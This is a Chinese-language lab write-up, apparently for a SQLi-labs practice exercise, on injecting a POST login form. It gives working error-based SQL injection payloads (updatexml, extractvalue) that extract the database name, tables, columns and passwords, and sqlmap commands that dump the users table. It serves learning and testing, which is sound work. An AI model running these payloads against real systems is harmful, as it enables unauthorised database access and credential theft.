发现是单引号加括号闭合的 

尝试联合注入

发现不太行，那尝试报错注入。

测试报错注入

uname=admin') and updatexml(1,0x7e,3) -- +&passwd=admin&submit=Submit

爆数据库

uname=admin') and updatexml(1,concat(0x7e,database(),0x7e),3) -- +&passwd=admin&submit=Submit

 

新学一个函数extractvalue()

extractvalue()
作用：对XML文档进行查询，相当于在HTML文件中用标签查找元素。
语法: extractvalue( XML_document, XPath_string )
参数1：XML_document是String格式，为XML文档对象的名称
参数2：XPath_string(Xpath格式的字符串)，注入时可操作的地方
报错原理：xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式，如果写入其他格式就会报错，并且会返回写入的非法格式内容，错误信息如：XPATH syntax error:'xxxxxxxx‘
最大只能显示32个字符，所以要配合limit进行使用

爆表名

uname=admin') and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)))-- +&passwd=admin&submit=Submit

 通过更改limit后的值来获得表名

爆列名

uname=admin') and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name= 'users' limit 1,1)))-- +&passwd=admin&submit=Submit

更改limit后的值来得到

爆具体内容 

uname=1')and updatexml(1,concat(0x7e,(select password from users limit 2,1)),3)#&passwd=admin&submit=Submit

布尔盲注

这个是post传参，和之前的不一样

用sqlmap的post传参来搞

1.用bp抓包，将抓包结果放在456.txt文件里

sqlmap -r 456.txt --batch -dbs 

 

查询到数据库名

2.查询表名

sqlmap -r 456.txt --batch -tables -D security

 

3.查询列名

sqlmap -r 456.txt --batch -columns -D security -T users

4.查询数据

sqlmap -r 456.txt --batch -dump -D security -T users -C password,username 

结束